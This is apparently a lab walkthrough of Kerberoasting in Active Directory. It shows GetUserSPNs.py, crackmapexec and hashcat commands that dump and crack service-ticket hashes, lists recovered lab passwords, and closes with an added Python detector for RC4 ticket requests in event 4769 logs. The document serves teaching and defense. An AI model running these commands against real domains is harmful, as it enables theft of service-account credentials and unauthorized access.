Kerberoasting
Kerberoasting is a post-exploitation attack technique that attempts to crack the password of a service account within Active Directory (AD).
In such an attack, an adversary acting as a domain user requests a Kerberos service ticket for an account that has a service principal name (SPN); part of that ticket is encrypted with a key derived from the service account's password. (An SPN is an attribute that ties a service to a user account within AD.) The adversary then works offline to crack the password hash, often using brute-force techniques.
Once the plaintext credentials of the service account are exposed, the adversary possesses user credentials that they can use to impersonate the account owner. In so doing, they appear to be an approved and legitimate user and have unfettered access to any systems, assets or networks granted to the compromised account.
GetUserSPNs.py -request -dc-ip 192.168.56.11 north.newyork.local/claudio.ortiz:babyboy -outputfile kerberoasting.hashes
You can also do that with cme, using the following command:
crackmapexec ldap 192.168.56.11 -u claudio.ortiz -p 'babyboy' -d north.newyork.local --kerberoasting kerberoasting.hashes
Let's try to crack the hashes:
hashcat -m 13100 --force -a 3 '$krb5tgs$23$*elena.Lopez$NORTH.NEWYORK.LOCAL$north.newyork.local/elena.Lopez*$8b765ed876f3d1a0159b4d10bbbbaf27$...' rockyou.txt
miguel.cabrera = ilovebaseball
claudio.ortiz = babyboy
pacofish = pacofish
elena.lopez = princesa1
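On the defensive side, the ticket requests above are recorded on the domain controller as Security event 4769, and the "$23$" in the captured hash is the RC4-HMAC encryption type (0x17). The following is an added example, not part of the original page: it flags an account that requests RC4 service tickets for several distinct user-based service accounts in a short window. The sample records are constructed, and the names ana.ruiz and FILESRV01$, the threshold and the window are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = 0x17  # etype 23: the "$23$" in a $krb5tgs$23$ hash (hashcat mode 13100)

def ev(time, user, service, etype):
    """Build one constructed record using event 4769 field names."""
    return {"TimeCreated": "2024-01-10T" + time,
            "TargetUserName": user + "@NORTH.NEWYORK.LOCAL",
            "ServiceName": service, "TicketEncryptionType": etype}

# Constructed sample records, not from a real log.
# ana.ruiz and FILESRV01$ are made-up names used as benign traffic.
SAMPLE_EVENTS = [
    ev("09:00:01", "claudio.ortiz", "elena.lopez", "0x17"),
    ev("09:00:01", "claudio.ortiz", "miguel.cabrera", "0x17"),
    ev("09:00:02", "claudio.ortiz", "pacofish", "0x17"),
    ev("09:03:10", "ana.ruiz", "FILESRV01$", "0x12"),
    ev("09:04:00", "ana.ruiz", "elena.lopez", "0x12"),
    ev("10:30:00", "ana.ruiz", "miguel.cabrera", "0x17"),
]

def find_roasting(events, min_services=3, window_minutes=5):
    """Return {requesting account: sorted service names} for accounts that asked
    for RC4 tickets to at least min_services distinct services within the window."""
    window = timedelta(minutes=window_minutes)
    per_account = defaultdict(list)
    for e in events:
        service = e["ServiceName"]
        # Machine accounts ($) and krbtgt have random keys, so they are not roasting targets.
        if service.endswith("$") or service.lower() == "krbtgt":
            continue
        if int(e["TicketEncryptionType"], 16) != RC4_HMAC:
            continue  # AES tickets (0x11, 0x12) are ignored by this check
        per_account[e["TargetUserName"]].append((datetime.fromisoformat(e["TimeCreated"]), service))
    hits = {}
    for account, reqs in per_account.items():
        reqs.sort()
        start = 0
        for end in range(len(reqs)):
            while reqs[end][0] - reqs[start][0] > window:  # slide the window forward
                start += 1
            services = {name for _, name in reqs[start:end + 1]}
            if len(services) >= min_services:
                hits[account] = sorted(services)
                break
    return hits

if __name__ == "__main__":
    print(find_roasting(SAMPLE_EVENTS))
```

The threshold and window need tuning per environment. Every password recovered above was a short wordlist entry, so long random service account passwords remain the primary mitigation.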